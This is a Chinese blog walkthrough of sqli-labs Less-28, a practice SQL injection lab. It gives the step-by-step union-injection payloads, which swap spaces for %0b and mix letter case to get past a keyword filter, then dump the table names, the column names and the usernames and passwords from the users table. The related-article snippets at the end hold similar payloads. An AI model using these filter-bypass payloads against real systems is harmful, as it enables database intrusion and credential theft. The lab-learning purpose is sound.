sqli-labs/Less-28

最新推荐文章于 2024-07-31 17:35:08 发布
最新推荐文章于 2024-07-31 17:35:08 发布
阅读量349 收藏
点赞数
文章标签: 数据库 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71299382/article/details/127949817
版权

首先判断一下是否为数字型

输入如下

id=1%0band%0b1=2

正确回显所以属于字符型

然后判断是单引还是双引 输入如下

id=1'

报错了 说明一定属于单引号注入点 佐证一下

然后判断是否带有括号 输入如下

id=1')%0bor%0b('1'='1

回显如下

 

我们可以把这两句话放在sqlyog里面去看一看

首先对于第一句 因为源代码里面含有limit 0,1所以要加上去

 

select id from users where id=('1' or '1'='1') limit 0,1;

这个条件相当于被类型转换为了1相当于查询的是id为1的结果

 回显如下

 对于第二句 输入如下

select id from users where id=('1' or '1'='1') limit 0,1;

回显如下

好了对于这两句话的理解就到这边了

接下来我们知道了注入点为单引号并且带了一个括号之后 选择要使用的方法 由于缺乏报错信息 所以不适用报错注入去完成这一道题目 我这里选择联合注入

首先判断回显点 输入如下

id=1')%0bunioN%0bselecT%0b1,2,3%0bor%0b('1'='1

回显如下

多试几次 找出真正的回显点 发现只有一处能够回显那就是2 

开始爆库 输入如下

id=0')%0bunioN%0bselecT%0b1,database(),3%0bor%0b('1'='1

回显如下

开始爆表 输入如下

id=0')%0bunioN%0bselecT%0b1,group_concat(table_name),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema=database()%0band%0b('1'='1

 回显如下

开始爆字段 输入如下

id=0')%0bunioN%0bselecT%0b1,group_concat(column_name),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_name='users'%0band%0btable_schema=database()%0band%0b('1'='1

 回显如下

爆用户名和密码等相关信息 输入如下

id=0')%0bunioN%0bselecT%0b1,group_concat(username,password),3%0bfrom%0busers%0bwhere%0b('1'='1

 回显如下

这一关和上一关差不多 嗨嗨成功解题!! 

axihaihai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Sqli-labs靶场详细攻略Less 23-28a
qq_41755084的博客
10-14 544
这一关还是使用get方法进行注入,不过这次对、这些用于注释的字符做了过滤。这样我们可以使用两个进行绕过,第一个用于闭合原代码语句中的前一个,后一个用来闭合源代码语句中的后一个。在两个单引号中间加上我们想要执行的sql语句即可。在id参数上传入代码 发现回显的部分还是与基础部分的效果一样,也就是回显3列的查询,显示出的是第2,3列的内容。那么,就可以正常注入了,在union select的第2或3的位置放上查询的payload 查询成功。这一关为二次排序注入,也叫存储型的注入,具体是将可能导致sql注入的字符
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1821
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs less 28
weixin_34405354的博客
08-11 120
Less-28 本关考察内容与27关没有太大的差距,我们直接给出一个payload: http://127.0.0.1/sqllib/Less-28/?id=100')union%a0select(1),(user()),(3)||('1 转载于:https://www.cnblogs.com/lcamry/p/5762973.html...
sqli-labs第28关,28a关
最新发布
weixin_46023655的博客
07-31 255
sqli-labs第2828a关
sqli-labs————Less-28
Fly_鹏程万里
05-16 1105
Less 28这一关于之前的27关没有什么差别,这里直接给出一个payload,用户可以自己思考自我测试,如果有不清楚的可以查看之前的第27关的详细介绍。payload:http://192.168.11.136/sqli-labs/Less-28?id=1')union%a0select(1),(user()),(3)||('1...
sqlilabs less-28~less-28a
TA不懒,但还没有添加简介
07-22 738
sqlilabs less-28~less-8a
Sqli-labs之Less-28和Less-28a
m0_46315342的博客
06-04 658
                                          &nbs...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1389
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 697
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
[靶场] SQLi-Labs Less28-Less36
3hex的博客
09-26 205
提供主要的语句,略去探测数据库名,表名,字段名的步骤。 31.Less28 请求方式 注入方式 类型 备注 GET 基于报错注入(Union内联注入) 字符型 过滤关键词select、union以及组合,单引号、括号闭合 1. 正常提交 http://127.0.0.1:8003/Less-28/?id=1 2. 语句报错 http://127.0.0.1:8003/Less-28/?id=1 1'2"3 http://127.0.0.1:8003.
Sqlilabs-28
KAKA的博客
07-14 436
因为是 Winodws 那就盲注吧,这跟 26a27a 关卡一样, payload 改改就可以用了,这一关同样把报错信息给过滤了,所以报错注入用不了: –查表 http://sqlilabs/Less-28/?id=1')and(if(ascii(substr((SeLect(table_name)from(SeLect(table_name),(table_rows)from(information_schema.tables)where(table_schema=database())and(tabl
sqli-labs:less-28(过滤了union和select)
羽的博客
09-15 278
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; cha...
sqli-labs-less-23~28
giun的博客
02-14 554
Less-23 过滤了#,–,那么我们需要采用闭合引号方式进行注入, http://127.0.0.1/sqli-labs-master/Less-23/?id=-1%27%20union%20select%201,@@basedir,%273 http://127.0.0.1/sqli-labs-master/Less-23/?id=-1’ union select 1,@@datadir...
sqli-labs(28-28a)
qq_43579362的博客
02-15 1476
Less-28 1.测试http://127.0.0.1/sqli-labs/Less-28/?id=1%27,页面回显不正常,但又没有错误提示,报错注入没戏,尝试闭合语句,加单引号回显不正常,说明sql语句闭合至少有',可能有),判断有无)在Less-26已经写过,经过验证确实含有'。 2.尝试使用联合查询注入,构造语句http://127.0.0.1/sqli-labs/Less-28/?id...
sqli-labs (less25-less28a)
Xi4or0uji
08-04 424
这里开始就是各种花式绕waf了,肉鸡打算把它们放在一篇,所以可能会很长 less 25 or &amp;&amp; and 至于怎么绕? 大小写:Or、oR 重复:oorr、anandd 符号:&amp;&amp;、|| 各种编码:0x.....、unicode 然后..........没有然后了(想不到了 剩下的payload顺便给一给 ?id=1' oorr extract...
SQL-labs的第28关——union和select被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-04 375
该关的空格、-和注释也别屏蔽了。这里是屏蔽union select这个组合而不是单个的union或select。并且该关不返回错误,所以不使用?id=1\,而且也不使用报错注入。
(手工)【sqli-labs2828a】字符型注入、盲注、过滤
07-14 1092
SQL-字符型注入、盲注、过滤】
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

axihaihai

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值